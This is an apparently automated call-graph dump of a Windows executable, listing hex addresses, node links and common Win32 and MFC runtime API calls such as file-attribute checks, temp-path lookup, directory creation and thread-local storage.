110609 4c279e 37 API calls 2 library calls 109936->110609 109938 4796f4 109937->109938 109940 47a22e 47 API calls 109938->109940 110610 40ae8e 64 API calls 2 library calls 109939->110610 109942 4796ff 109940->109942 109945 47970f Sleep 109942->109945 109946 4797bd 109942->109946 109944 47944a 109948 4c5fe3 ctype 35 API calls 109944->109948 109949 479728 109945->109949 109950 4c5f18 ctype 67 API calls 109946->109950 109947 47946e 109951 4c5fe3 ctype 35 API calls 109947->109951 109952 479457 109948->109952 109956 47975c 109949->109956 110650 4c279e 37 API calls 2 library calls 109949->110650 109953 4797ce 109950->109953 109954 479486 109951->109954 109955 4c5eaa ctype 32 API calls 109952->109955 109957 47a22e 47 API calls 109953->109957 110611 4c613f 109954->110611 109955->109939 109961 4c613f 38 API calls 109956->109961 109959 4797d9 109957->109959 109963 4c5fe3 ctype 35 API calls 109959->109963 109965 47976f 109961->109965 109967 4797e6 109963->109967 110651 4c60d9 37 API calls 2 library calls 109965->110651 109966 479743 109970 4c5fe3 ctype 35 API calls 109966->109970 109971 4c5eaa ctype 32 API calls 109967->109971 109968 4794ab 109972 4c5fe3 ctype 35 API calls 109968->109972 109974 479750 109970->109974 109976 4797f2 109971->109976 109977 4794bb 109972->109977 109973 479781 109978 4c5fe3 ctype 35 API calls 109973->109978 109975 4c5eaa ctype 32 API calls 109974->109975 109975->109956 109984 4c5f18 ctype 67 API calls 109976->109984 109979 4c5eaa ctype 32 API calls 109977->109979 109980 47978e 109978->109980 109981 4794c7 109979->109981 109982 4c5eaa ctype 32 API calls 109980->109982 109983 4c5eaa ctype 32 API calls 109981->109983 109985 47979a 109982->109985 109986 4794d3 109983->109986 109987 479815 109984->109987 109988 4c5eaa ctype 32 API calls 109985->109988 110622 4c279e 37 API calls 2 library calls 109986->110622 110394 473bec 109987->110394 109991 4797a6 SetFileAttributesA DeleteFileA 109988->109991 109991->109946 109992 479524 110623 40afe1 227 API calls 2 library calls 109992->110623 109995 4c5f18 ctype 67 API calls 109997 479833 109995->109997 109996 479533 109998 47953b 109996->109998 109999 4796c8 109996->109999 110000 473bec 130 API calls 109997->110000 110002 4c5f18 ctype 67 API calls 109998->110002 110001 4c5eaa ctype 32 API calls 109999->110001 110003 479840 110000->110003 110005 4796d4 110001->110005 110006 479549 110002->110006 110004 4c6033 ctype 35 API calls 110003->110004 110008 47985c GetTempPathA 110004->110008 110649 40af5a 32 API calls 2 library calls 110005->110649 110624 4c6286 110006->110624 110011 4c2c3a 62 API calls 110008->110011 110013 479888 110011->110013 110015 4c2c4d 34 API calls 110013->110015 110017 479899 110015->110017 110016 4c613f 38 API calls 110018 47957b 110016->110018 110019 4c5f18 ctype 67 API calls 110017->110019 110639 4c62c2 34 API calls ctype 110018->110639 110021 4798aa 110019->110021 110023 47a22e 47 API calls 110021->110023 110022 479588 110024 4c5eaa ctype 32 API calls 110022->110024 110025 4798b5 110023->110025 110026 479594 110024->110026 110027 47993c 110025->110027 110029 4798c8 110025->110029 110028 4c5eaa ctype 32 API calls 110026->110028 110030 4c5f18 ctype 67 API calls 110027->110030 110031 4795a0 110028->110031 110652 4c279e 37 API calls 2 library calls 110029->110652 110033 47994c 110030->110033 110034 4c5f18 ctype 67 API calls 110031->110034 110036 4c5c1f ctype 36 API calls 110033->110036 110046 4795ad 110034->110046 110035 4798da 110038 4c5fe3 ctype 35 API calls 110035->110038 110037 479964 110036->110037 110402 47a400 110037->110402 110041 4798e7 110038->110041 110040 47961d 110044 4c5eaa ctype 32 API calls 110040->110044 110042 4c5eaa ctype 32 API calls 110041->110042 110047 4798f3 110042->110047 110049 479629 Sleep 110044->110049 110045 4c6033 ctype 35 API calls 110045->110046 110046->110040 110046->110045 110070 4c6286 35 API calls ctype 110046->110070 110640 4c63cc 110046->110640 110645 4c62c2 34 API calls ctype 110046->110645 110051 4c2c4d 34 API calls 110047->110051 110048 4c5fe3 ctype 35 API calls 110052 479985 110048->110052 110053 4c613f 38 API calls 110049->110053 110055 4798fc GetFileAttributesA 110051->110055 110056 4c5eaa ctype 32 API calls 110052->110056 110054 479647 110053->110054 110646 4c60d9 37 API calls 2 library calls 110054->110646 110058 479921 GetFileAttributesA 110055->110058 110059 47990c 110055->110059 110060 479991 110056->110060 110058->110027 110064 47992b 110058->110064 110062 4c5c1f ctype 36 API calls 110059->110062 110063 4c5c1f ctype 36 API calls 110060->110063 110061 479659 110647 40e49e 45 API calls 2 library calls 110061->110647 110066 47991b 110062->110066 110067 4799a5 110063->110067 110068 4c5fe3 ctype 35 API calls 110064->110068 110071 40ca76 50 API calls 110066->110071 110429 40ca76 110067->110429 110068->110027 110069 479675 110073 4c5eaa ctype 32 API calls 110069->110073 110070->110046 110074 479920 110071->110074 110076 479681 110073->110076 110074->110058 110081 4c5eaa ctype 32 API calls 110076->110081 110078 4799af 110082 4c61b3 38 API calls 110078->110082 110079 4799ea 110458 479fb0 110079->110458 110084 47968d 110081->110084 110085 4799d0 110082->110085 110087 4c5eaa ctype 32 API calls 110084->110087 110653 4cdc20 38 API calls ctype 110085->110653 110086 4c5fe3 ctype 35 API calls 110089 479a02 110086->110089 110090 4796a8 110087->110090 110092 4c5eaa ctype 32 API calls 110089->110092 110093 4c5eaa ctype 32 API calls 110090->110093 110091 4799de 110095 4c5eaa ctype 32 API calls 110091->110095 110094 479a0e 110092->110094 110096 4796b4 110093->110096 110097 479a1a GetFileAttributesA 110094->110097 110098 479eb9 110094->110098 110099 479bbc 110095->110099 110648 40af5a 32 API calls 2 library calls 110096->110648 110097->110098 110102 479a2a 110097->110102 110101 4c61b3 38 API calls 110098->110101 110103 4c5eaa ctype 32 API calls 110099->110103 110105 479ed5 110101->110105 110521 46deea 110102->110521 110107 479f1a 110103->110107 110104 4796c3 110108 479b37 110104->110108 110109 4c613f 38 API calls 110105->110109 110112 4c5eaa ctype 32 API calls 110107->110112 110111 4c5eaa ctype 32 API calls 110108->110111 110113 479ee8 110109->110113 110116 479b43 110111->110116 110117 479f26 110112->110117 110671 4cdc20 38 API calls ctype 110113->110671 110122 4c5eaa ctype 32 API calls 110116->110122 110118 4c5eaa ctype 32 API calls 110117->110118 110123 479f32 110118->110123 110127 479b4f 110122->110127 110128 4c5eaa ctype 32 API calls 110123->110128 110124 479ef6 110129 4c5eaa ctype 32 API calls 110124->110129 110133 4c5eaa ctype 32 API calls 110127->110133 110135 479f3e 110128->110135 110129->110091 110134 479b5b 110133->110134 110140 4c5eaa ctype 32 API calls 110134->110140 110141 4c5eaa ctype 32 API calls 110135->110141 110145 479b67 110140->110145 110146 479f4a 110141->110146 110150 4c5eaa ctype 32 API calls 110145->110150 110151 4c5eaa ctype 32 API calls 110146->110151 110155 479b72 110150->110155 110156 479f56 110151->110156 110161 4c5eaa ctype 32 API calls 110155->110161 110156->109903 110161->110166 110166->109849 110229 49a52d GlobalAlloc 110228->110229 110230 49a570 110228->110230 110229->110230 110231 49a540 TlsSetValue 110229->110231 110230->109849 110232 49a55a GlobalHandle GlobalUnlock GlobalFree 110231->110232 110233 49a552 110231->110233 110232->110230 111836 49a410 lstrcpy 110233->111836 110235 49a557 110235->109849 110236->109848 110238 4d373b ctype 28 API calls 110237->110238 110239 4d3766 110238->110239 110242 4d4878 110239->110242 110243 4d48ae TlsGetValue 110242->110243 110244 4d4881 110242->110244 110245 4d48c1 110243->110245 110246 4d489b 110244->110246 110263 4d4478 RaiseException TlsAlloc RtlInitializeCriticalSection ctype 110244->110263 110249 4caaf0 110245->110249 110250 4d48d4 110245->110250 110253 4d4511 RtlEnterCriticalSection 110246->110253 110248 4d48ac 110248->110243 110249->109855 110249->109856 110264 4d4680 8 API calls ctype 110250->110264 110258 4d4530 110253->110258 110254 4d457d GlobalHandle GlobalUnlock GlobalReAlloc 110259 4d459f 110254->110259 110255 4d456a GlobalAlloc 110255->110259 110256 4d45ec ctype 110257 4d4601 RtlLeaveCriticalSection 110256->110257 110257->110248 110258->110254 110258->110255 110258->110256 110260 4d45ad GlobalHandle GlobalLock RtlLeaveCriticalSection 110259->110260 110261 4d45c8 GlobalLock 110259->110261 110265 4c23d5 RaiseException ctype 110260->110265 110261->110256 110263->110246 110264->110249 110267 4d4917 __EH_prolog 110266->110267 110268 4d4945 110267->110268 110272 4d435c 6 API calls ctype 110267->110272 110268->109860 110271 4d492e 110273 4d43cc RtlLeaveCriticalSection 110271->110273 110272->110271 110273->110268 110275 4d373b ctype 28 API calls 110274->110275 110276 4d4a45 GetModuleFileNameA 110275->110276 110304 4afcdb 110276->110304 110278 4d4a77 110310 4d4b4f lstrlen lstrcpyn ctype 110278->110310 110280 4d4a93 110281 4d4aa9 110280->110281 110315 4b5ac3 29 API calls 2 library calls 110280->110315 110292 4d4ae3 110281->110292 110311 4c9c87 110281->110311 110283 4d4b16 110287 4d4b43 110283->110287 110288 4d4b25 lstrcat 110283->110288 110284 4d4afb lstrcpy 110317 4b5ac3 29 API calls 2 library calls 110284->110317 110287->109867 110318 4b5ac3 29 API calls 2 library calls 110288->110318 110292->110283 110292->110284 110294 4d373b ctype 28 API calls 110293->110294 110296 4cab05 110294->110296 110295 4cab5d 110295->109871 110296->110295 110320 4d3504 110296->110320 110299 4d490d ctype 7 API calls 110300 4cab3b 110299->110300 110301 4cab48 110300->110301 110302 4d373b ctype 28 API calls 110300->110302 110303 4d4878 ctype 21 API calls 110301->110303 110302->110301 110303->110295 110305 4afcf8 110304->110305 110307 4afce9 110304->110307 110306 4b62f4 ctype 29 API calls 110305->110306 110308 4afd00 110306->110308 110307->110278 110319 4b6355 RtlLeaveCriticalSection 110308->110319 110310->110280 110312 4d373b ctype 28 API calls 110311->110312 110313 4c9c8d LoadStringA 110312->110313 110314 4c9ca8 110313->110314 110316 4b5ac3 29 API calls 2 library calls 110314->110316 110315->110281 110316->110292 110317->110283 110318->110287 110319->110307 110321 4d4878 ctype 21 API calls 110320->110321 110322 4cab11 GetCurrentThreadId SetWindowsHookExA 110321->110322 110322->110299 110324 4a860e 110323->110324 110327 4a861d 110323->110327 110325 4d490d ctype 7 API calls 110324->110325 110325->110327 110326 4d373b ctype 28 API calls 110328 47928a 110326->110328 110327->110326 110329 4d4165 110328->110329 110330 4d4179 110329->110330 110335 479292 6F541CD0 CoInitialize 110329->110335 110331 4d490d ctype 7 API calls 110330->110331 110332 4d4188 110331->110332 110333 4d4260 110332->110333 110334 4d4193 LoadLibraryA 110332->110334 110333->110335 110337 4d373b ctype 28 API calls 110333->110337 110336 4d41a5 9 API calls 110334->110336 110341 4d4205 110334->110341 110343 49a3d0 110335->110343 110336->110341 110337->110335 110338 4d4223 110339 4d424f FreeLibrary 110338->110339 110340 4d4259 110338->110340 110339->110340 110340->110333 110341->110338 110342 4d373b ctype 28 API calls 110341->110342 110342->110338 110344 49a3d9 TlsAlloc 110343->110344 110345 4792a7 110343->110345 110344->110345 110345->109883 110345->109884 110347 4b202f GetTimeZoneInformation 110346->110347 110348 4b1ff4 110346->110348 110349 4b2028 110347->110349 110348->110347 110348->110349 110673 4bae20 110349->110673 110352 4b1f9b 110751 4b6c43 GetLastError TlsGetValue 110352->110751 110354 4792ca GetModuleFileNameA 110354->109892 110356 4afcdb 29 API calls 110355->110356 110357 47930b 110356->110357 110357->109896 110357->109897 110359 4c2824 __EH_prolog 110358->110359 110360 4c2839 110359->110360 110361 4c2847 110359->110361 110362 4c5c1f ctype 36 API calls 110360->110362 110764 4c5ed4 31 API calls ctype 110361->110764 110365 479326 110362->110365 110364 4c2865 110366 4c5c1f ctype 36 API calls 110364->110366 110365->109901 110367 4c2871 110366->110367 110368 4c5eaa ctype 32 API calls 110367->110368 110368->110365 110370 4c5e53 ctype 34 API calls 110369->110370 110371 4c2c57 ctype 110370->110371 110372 479357 110371->110372 110765 4afde7 29 API calls ctype 110371->110765 110372->109913 110375 47a238 __EH_prolog 110374->110375 110376 4c63cc ctype 43 API calls 110375->110376 110377 47a261 110376->110377 110766 4c5e35 110377->110766 110379 47a2d7 110380 4c5c1f ctype 36 API calls 110379->110380 110381 47a2e3 110380->110381 110383 4c5eaa ctype 32 API calls 110381->110383 110382 4c6033 ctype 35 API calls 110384 47a269 110382->110384 110385 47a2f2 110383->110385 110384->110379 110384->110382 110386 4c5fe3 35 API calls ctype 110384->110386 110389 4c63cc ctype 43 API calls 110384->110389 110387 4c5eaa ctype 32 API calls 110385->110387 110386->110384 110388 47a2fe 110387->110388 110390 4c5eaa ctype 32 API calls 110388->110390 110389->110384 110391 47a309 110390->110391 110392 4c5eaa ctype 32 API calls 110391->110392 110393 479388 110392->110393 110393->109920 110395 473bfb 110394->110395 110396 4815f0 130 API calls 110395->110396 110397 473c07 110396->110397 110770 481930 110397->110770 110400 4c5eaa ctype 32 API calls 110401 473c2a 110400->110401 110401->109995 110403 47a40a __EH_prolog 110402->110403 110404 4c5c1f ctype 36 API calls 110403->110404 110405 47a428 110404->110405 110406 4c2c4d 34 API calls 110405->110406 110407 47a439 110406->110407 110408 4c2c3a 62 API calls 110407->110408 110409 47a45b 110408->110409 110410 47a467 GetFileAttributesA 110409->110410 110412 4c2c3a 62 API calls 110409->110412 110410->110409 110411 47a488 110410->110411 110413 4c5fe3 ctype 35 API calls 110411->110413 110412->110409 110414 47a494 110413->110414 110415 4c5c1f ctype 36 API calls 110414->110415 110416 47a4a3 110415->110416 110417 40ca76 50 API calls 110416->110417 110418 47a4a8 110417->110418 110419 4c5c1f ctype 36 API calls 110418->110419 110420 47a4b5 110419->110420 110421 4c5eaa ctype 32 API calls 110420->110421 110422 47a4c8 110421->110422 110423 4c5eaa ctype 32 API calls 110422->110423 110424 47a4d4 110423->110424 110425 4c5eaa ctype 32 API calls 110424->110425 110426 47a4e0 110425->110426 110427 4c5eaa ctype 32 API calls 110426->110427 110428 479973 110427->110428 110428->110048 110430 40ca80 __EH_prolog 110429->110430 110796 4c2dd9 110430->110796 110432 40ca9d 110803 4c2ce2 110432->110803 110436 40caaf 110437 4c2ce2 ctype 40 API calls 110436->110437 110438 40cab7 110437->110438 110811 4c62ad 110438->110811 110441 40cae8 ctype 110442 40cb52 110441->110442 110448 40cafd 110441->110448 110456 40cb4d 110441->110456 110444 4c281a ctype 37 API calls 110442->110444 110443 40cbec SetCurrentDirectoryA 110445 4c5eaa ctype 32 API calls 110443->110445 110446 40cb60 110444->110446 110447 40cc05 110445->110447 110814 4af56e 29 API calls 2 library calls 110446->110814 110447->110078 110447->110079 110448->110443 110450 40cb26 SetCurrentDirectoryA 110448->110450 110448->110456 110450->110448 110452 40cb37 CreateDirectoryA 110450->110452 110451 40cb6d 110453 4c5eaa ctype 32 API calls 110451->110453 110452->110448 110454 40cb7f 110453->110454 110454->110443 110455 40cbba SetCurrentDirectoryA 110454->110455 110454->110456 110455->110454 110457 40cbcb CreateDirectoryA 110455->110457 110456->110443 110457->110454 110459 479fba __EH_prolog 110458->110459 110460 4c5f18 ctype 67 API calls 110459->110460 110461 479fd4 110460->110461 110462 4c5f18 ctype 67 API calls 110461->110462 110463 479fea 110462->110463 110464 4c6286 ctype 35 API calls 110463->110464 110465 479ffb 110464->110465 110466 4c5c1f ctype 36 API calls 110465->110466 110467 47a00b 110466->110467 110468 47a22e 47 API calls 110467->110468 110469 47a016 110468->110469 110470 47a0fd 110469->110470 110472 47a044 110469->110472 110473 47a0f1 110469->110473 110471 4c5eaa ctype 32 API calls 110470->110471 110475 47a109 110471->110475 110836 4c279e 37 API calls 2 library calls 110472->110836 110474 4c5eaa ctype 32 API calls 110473->110474 110474->110470 110477 4c5eaa ctype 32 API calls 110475->110477 110479 47a114 110477->110479 110478 47a056 110480 4c5fe3 ctype 35 API calls 110478->110480 110481 47a19d 110479->110481 110483 4c5fe3 ctype 35 API calls 110479->110483 110482 47a063 110480->110482 110484 4c5c1f ctype 36 API calls 110481->110484 110485 4c5eaa ctype 32 API calls 110482->110485 110487 47a13a 110483->110487 110488 47a1a9 110484->110488 110486 47a06f GetFileAttributesA 110485->110486 110489 47a08a 110486->110489 110490 47a079 110486->110490 110491 4c2892 29 API calls 110487->110491 110492 4c5eaa ctype 32 API calls 110488->110492 110495 4c5fe3 ctype 35 API calls 110489->110495 110494 4c5fe3 ctype 35 API calls 110490->110494 110496 47a144 110491->110496 110493 4799f5 110492->110493 110493->110086 110517 47a085 110494->110517 110497 47a0a7 110495->110497 110498 47a192 110496->110498 110499 4c281a ctype 37 API calls 110496->110499 110500 4c2c4d 34 API calls 110497->110500 110501 4c5eaa ctype 32 API calls 110498->110501 110502 47a156 110499->110502 110503 47a0b5 110500->110503 110501->110481 110504 4c5fe3 ctype 35 API calls 110502->110504 110505 4c6286 ctype 35 API calls 110503->110505 110506 47a163 110504->110506 110507 47a0be 110505->110507 110508 4c5eaa ctype 32 API calls 110506->110508 110837 4c62c2 34 API calls ctype 110507->110837 110510 47a16f 110508->110510 110512 4c6286 ctype 35 API calls 110510->110512 110511 47a0ca GetFileAttributesA 110513 47a0d4 110511->110513 110519 47a0e0 110511->110519 110515 47a17c GetFileAttributesA 110512->110515 110516 4c5fe3 ctype 35 API calls 110513->110516 110514 4c5eaa ctype 32 API calls 110514->110517 110515->110498 110518 47a186 110515->110518 110516->110519 110517->110473 110520 4c5fe3 ctype 35 API calls 110518->110520 110519->110514 110520->110498 110522 46def4 __EH_prolog ctype 110521->110522 110523 4c5f18 ctype 67 API calls 110522->110523 110524 46df65 110523->110524 110525 4c5f18 ctype 67 API calls 110524->110525 110526 46df7b 110525->110526 110527 4c5c1f ctype 36 API calls 110526->110527 110528 46df8e 110527->110528 110838 41d254 110528->110838 110531 4c5f18 ctype 67 API calls 110532 46dfb1 110531->110532 110876 41d449 110532->110876 110536 4c5eaa ctype 32 API calls 110538 46e283 110536->110538 110939 4cde1e 39 API calls 2 library calls 110538->110939 110540 46e28f 110940 4c40b9 29 API calls 2 library calls 110540->110940 110542 46dfd1 110544 4c5f18 ctype 67 API calls 110542->110544 110543 46e29b ctype 110941 41d21b 29 API calls 2 library calls 110543->110941 110545 46dff4 110544->110545 110547 4c5c1f ctype 36 API calls 110545->110547 110548 46e2b6 110550 4c5eaa ctype 32 API calls 110548->110550 110552 46e2c2 110550->110552 110554 4c5eaa ctype 32 API calls 110552->110554 110557 46e2cd 110554->110557 110556 46e018 110938 4cdc20 38 API calls ctype 110556->110938 110942 4c564a 39 API calls 2 library calls 110557->110942 110604 46e25b 110604->110536 110607->109887 110608->109928 110609->109944 110610->109947 110612 4c6149 __EH_prolog 110611->110612 110613 4c6168 lstrlen 110612->110613 110614 4c6164 110612->110614 110613->110614 110615 4c609b ctype 31 API calls 110614->110615 110616 4c6186 110615->110616 110617 4c5c1f ctype 36 API calls 110616->110617 110618 4c6192 110617->110618 110619 4c5eaa ctype 32 API calls 110618->110619 110620 479499 110619->110620 110621 4c60d9 37 API calls 2 library calls 110620->110621 110621->109968 110622->109992 110623->109996 110625 4c6296 lstrlen 110624->110625 110626 4c6292 110624->110626 110625->110626 110627 4c6227 ctype 34 API calls 110626->110627 110628 47955a 110627->110628 110629 4c61b3 110628->110629 110630 4c61bd __EH_prolog 110629->110630 110631 4c61dc lstrlen 110630->110631 110632 4c61d8 110630->110632 110631->110632 110633 4c609b ctype 31 API calls 110632->110633 110634 4c61fa 110633->110634 110635 4c5c1f ctype 36 API calls 110634->110635 110636 4c6206 110635->110636 110637 4c5eaa ctype 32 API calls 110636->110637 110638 47956c 110637->110638 110638->110016 110639->110022 110641 4c5e53 ctype 34 API calls 110640->110641 110642 4c63d4 110641->110642 111824 4b52da 110642->111824 110645->110046 110646->110061 110647->110069 110648->110104 110649->109935 110650->109966 110651->109973 110652->110035 110653->110091 110671->110124 110672->110156 110674 4bae39 110673->110674 110676 4792c4 110673->110676 110674->110676 110679 4b9650 110674->110679 110676->110352 110680 4b9659 110679->110680 110686 4b967c 110679->110686 110681 4b62f4 ctype 29 API calls 110680->110681 110682 4b9660 110681->110682 110685 4b966f 110682->110685 110688 4b967e 110682->110688 110716 4b6355 RtlLeaveCriticalSection 110685->110716 110686->110676 110687 4b9905 29 API calls ctype 110686->110687 110687->110676 110689 4b62f4 ctype 29 API calls 110688->110689 110690 4b9694 110689->110690 110717 4b30af 110690->110717 110693 4b96bf 110723 4b6355 RtlLeaveCriticalSection 110693->110723 110695 4b98f9 110728 4b6355 RtlLeaveCriticalSection 110695->110728 110697 4b96c5 GetTimeZoneInformation 110699 4b97a5 _rand 110697->110699 110702 4b96db WideCharToMultiByte 110697->110702 110698 4af0b8 ___free_lc_time 29 API calls 110701 4b97ea _rand 110698->110701 110699->110685 110700 4b97bc _wctomb_s 110700->110695 110700->110698 110705 4af1a1 ctype 29 API calls 110701->110705 110704 4b9768 WideCharToMultiByte 110702->110704 110704->110699 110706 4b97f7 110705->110706 110706->110695 110708 4b9807 _rand 110706->110708 110724 4b6355 RtlLeaveCriticalSection 110708->110724 110710 4b9814 _rand 110725 4b020d 6 API calls _wctomb_s 110710->110725 110712 4b9844 110712->110699 110726 4b020d 6 API calls _wctomb_s 110712->110726 110714 4b9872 110714->110699 110727 4b020d 6 API calls _wctomb_s 110714->110727 110716->110686 110718 4b30c1 110717->110718 110722 4b311e 110717->110722 110720 4b30d2 _rand 110718->110720 110718->110722 110734 4bd491 46 API calls 2 library calls 110718->110734 110720->110722 110729 4bd452 110720->110729 110722->110693 110722->110700 110723->110697 110724->110710 110725->110712 110726->110714 110727->110699 110728->110699 110730 4bd45b 110729->110730 110731 4bd45f 110729->110731 110730->110720 110735 4bfac3 110731->110735 110734->110720 110736 4bfaf6 CompareStringW 110735->110736 110738 4bfb0b _wctomb_s 110735->110738 110737 4bfb13 CompareStringA 110736->110737 110736->110738 110737->110738 110747 4bd47e 110737->110747 110739 4bfb6c CompareStringA 110738->110739 110740 4bfb87 110738->110740 110739->110747 110741 4bfc41 MultiByteToWideChar 110740->110741 110742 4bfbc6 GetCPInfo 110740->110742 110740->110747 110744 4bfc5d _wctomb_s 110741->110744 110741->110747 110743 4bfbdb 110742->110743 110742->110747 110743->110741 110743->110747 110745 4bfc99 MultiByteToWideChar 110744->110745 110744->110747 110746 4bfcb3 MultiByteToWideChar 110745->110746 110745->110747 110746->110747 110748 4bfccb _wctomb_s 110746->110748 110747->110720 110748->110747 110749 4bfcff MultiByteToWideChar 110748->110749 110749->110747 110750 4bfd16 CompareStringW 110749->110750 110750->110747 110752 4b6c5f 110751->110752 110753 4b6c9e SetLastError 110751->110753 110762 4b4dee 30 API calls 2 library calls 110752->110762 110753->110354 110755 4b6c68 110756 4b6c70 TlsSetValue 110755->110756 110757 4b6c96 110755->110757 110756->110757 110758 4b6c81 _rand 110756->110758 110763 4b21ae 7 API calls _rand 110757->110763 110761 4b6c87 GetCurrentThreadId 110758->110761 110760 4b6c9d 110760->110753 110761->110753 110762->110755 110763->110760 110764->110364 110765->110371 110767 4c5e52 110766->110767 110768 4c5e3d 110766->110768 110767->110384 110769 4c6033 ctype 35 API calls 110768->110769 110769->110767 110771 481940 110770->110771 110774 48a9b0 110771->110774 110773 473c1e 110773->110400 110775 48a9c5 ctype 110774->110775 110777 48aa07 110775->110777 110779 48aa70 110775->110779 110781 48aa5c 110775->110781 110785 48d2c0 110775->110785 110791 482870 130 API calls ctype 110775->110791 110777->110773 110793 48aa90 130 API calls ctype 110779->110793 110792 482a80 130 API calls ctype 110781->110792 110782 48aa82 110782->110773 110784 48aa67 110784->110773 110786 48d2d1 ctype 110785->110786 110789 48d30d 110786->110789 110790 48d318 110786->110790 110794 482a80 130 API calls ctype 110786->110794 110795 48d320 130 API calls ctype 110789->110795 110790->110775 110791->110775 110792->110784 110793->110782 110794->110789 110795->110790 110797 4c5e53 ctype 34 API calls 110796->110797 110798 4c2de2 110797->110798 110815 4b54cd 110798->110815 110800 4c2e06 ___free_lc_time 110800->110432 110801 4c2ded ctype 110801->110800 110802 4b54cd ctype 6 API calls 110801->110802 110802->110801 110804 4c5e53 ctype 34 API calls 110803->110804 110806 4c2cec ctype 110804->110806 110805 4b54cd ctype 6 API calls 110805->110806 110806->110805 110807 40caa5 110806->110807 110808 4c2ca0 110807->110808 110809 4c5e53 ctype 34 API calls 110808->110809 110810 4c2ca9 ctype 110809->110810 110810->110436 110825 4c6227 110811->110825 110813 40cac1 GetCurrentDirectoryA 110813->110441 110814->110451 110816 4b553a 110815->110816 110817 4b54dc 110815->110817 110818 4b554f 110816->110818 110824 4b238d 6 API calls _wctomb_s 110816->110824 110822 4b54fe 110817->110822 110823 4b81c6 6 API calls 2 library calls 110817->110823 110818->110801 110821 4b554b 110821->110801 110822->110801 110823->110822 110824->110821 110826 4c6234 110825->110826 110827 4c624a ctype 110825->110827 110826->110827 110831 4c609b 110826->110831 110827->110813 110829 4c627a 110835 4c5e12 32 API calls ctype 110829->110835 110832 4c60af 110831->110832 110833 4c60b5 ctype 110831->110833 110834 4c5d17 ctype 31 API calls 110832->110834 110833->110829 110834->110833 110835->110827 110836->110478 110837->110511 110839 41d25e __EH_prolog 110838->110839 110943 443c36 110839->110943 110843 41d282 110844 4c2c4d 34 API calls 110843->110844 110845 41d28b 110844->110845 110846 4c61b3 38 API calls 110845->110846 110847 41d299 110846->110847 110848 4c613f 38 API calls 110847->110848 110849 41d2a8 110848->110849 110850 4c5fe3 ctype 35 API calls 110849->110850 110851 41d2b5 110850->110851 110852 4c5eaa ctype 32 API calls 110851->110852 110853 41d2c1 110852->110853 110854 4c5eaa ctype 32 API calls 110853->110854 110855 41d2cc ctype 110854->110855 110856 4c62da ctype 34 API calls 110855->110856 110857 41d2fd 110856->110857 110858 4c62da ctype 34 API calls 110857->110858 110859 41d30d 110858->110859 110954 49d7a0 TlsGetValue 110859->110954 110861 41d32b 110862 4c6329 ctype 35 API calls 110861->110862 110863 41d338 110862->110863 110864 4c6329 ctype 35 API calls 110863->110864 110875 41d342 ctype 110864->110875 110865 41d402 110866 4c5eaa ctype 32 API calls 110865->110866 110867 41d40e 110866->110867 110869 4c5eaa ctype 32 API calls 110867->110869 110870 41d41a 110869->110870 110870->110531 110870->110556 110871 4c62da 34 API calls ctype 110871->110875 110872 49d7a0 625 API calls 110872->110875 110874 4c6329 35 API calls ctype 110874->110875 110875->110865 110875->110871 110875->110872 110875->110874 111205 4c512e 29 API calls ctype 110875->111205 111206 4c4661 29 API calls ctype 110875->111206 110881 41d451 110876->110881 110877 41d477 110878 4c5eaa ctype 32 API calls 110877->110878 110880 41d480 110878->110880 110880->110556 110882 4c40e6 110880->110882 110881->110877 111661 4afa15 44 API calls 2 library calls 110881->111661 110883 4c40f6 110882->110883 110884 4c4119 110883->110884 110885 4c4102 110883->110885 110887 4c4120 110884->110887 110890 4c413f 110884->110890 111662 4c5157 29 API calls ___free_lc_time 110885->111662 111663 4c512e 29 API calls ctype 110887->111663 110889 4c410a ctype 110889->110542 110890->110889 111664 4c512e 29 API calls ctype 110890->111664 110892 4c419f ctype 111665 4c5157 29 API calls ___free_lc_time 110892->111665 110938->110604 110939->110540 110940->110543 110941->110548 110944 41d274 110943->110944 110946 443c3f 110943->110946 110947 4c2d2e 110944->110947 110946->110944 111207 4c3f7e 29 API calls ctype 110946->111207 110948 4c2d3b lstrlen 110947->110948 110949 4c2d70 ___free_lc_time 110947->110949 110948->110949 110950 4c2d46 110948->110950 110949->110843 110951 4c5e53 ctype 34 API calls 110950->110951 110953 4c2d4d ctype 110951->110953 110953->110949 111208 4afde7 29 API calls ctype 110953->111208 110955 49d7fc 110954->110955 110956 49d7c0 110954->110956 110957 49d838 110955->110957 110958 49d804 110955->110958 110959 49a520 6 API calls 110956->110959 111211 4a0aa0 125 API calls 110957->111211 111209 4a1f10 TlsGetValue lstrcpy lstrcpyn lstrcpy lstrcpy 110958->111209 110962 49d7c5 110959->110962 110963 49d7c9 110962->110963 110964 49d7db TlsGetValue 110962->110964 110963->110861 110964->110955 110967 49d7ea 110964->110967 110965 49d818 111210 49a580 40 API calls 110965->111210 110966 49d8a5 111212 49d420 TlsGetValue 110966->111212 110967->110861 110969 49d823 110969->110861 110971 49d8ee 110972 49d918 110971->110972 110973 49d8f5 110971->110973 110977 49d993 lstrlen 110972->110977 110980 49d9ac 110972->110980 110983 49d91e 110972->110983 111213 4a07d0 23 API calls 110973->111213 110975 49d8fd 110975->110861 110977->110980 110977->110983 110978 49db91 111217 49a580 40 API calls 110978->111217 110982 49d9f1 lstrlen 110980->110982 110980->110983 110990 49da10 110980->110990 110981 49db9c 110981->110861 110982->110983 110985 49da01 lstrcpy 110982->110985 111216 4a1f10 TlsGetValue lstrcpy lstrcpyn lstrcpy lstrcpy 110983->111216 110984 49db4c 110987 49db6b lstrcpyn 110984->110987 110988 49dbb7 lstrcpy 110984->110988 110985->110990 110986 49dadf 110986->110984 110997 49db37 lstrlen 110986->110997 110989 49dbc6 110987->110989 110988->110989 111218 49e8a0 57 API calls 110989->111218 110990->110984 110990->110986 110992 49daca lstrlen 110990->110992 110992->110986 110994 49dad5 110992->110994 110993 49dbd9 110995 49dc21 110993->110995 110998 49dbf4 110993->110998 111214 4a1a60 IsDBCSLeadByte IsDBCSLeadByte CharNextA 110994->111214 110999 4a1b40 2 API calls 110995->110999 110997->110984 111000 49db42 110997->111000 111219 4a1b40 110998->111219 111002 49dc32 lstrcpy 110999->111002 111215 4a1a60 IsDBCSLeadByte IsDBCSLeadByte CharNextA 111000->111215 111224 49acb0 TlsGetValue 111002->111224 111006 49dc86 111009 49debe 111006->111009 111011 49deac 111006->111011 111012 49dd51 111006->111012 111013 49dca0 111006->111013 111014 49dda2 111006->111014 111015 49de02 111006->111015 111016 49de62 111006->111016 111017 49dd07 111006->111017 111018 49dd77 111006->111018 111052 49def6 111006->111052 111007 49dc48 111007->111006 111008 49dc4c 111007->111008 111229 4a1f10 TlsGetValue lstrcpy lstrcpyn 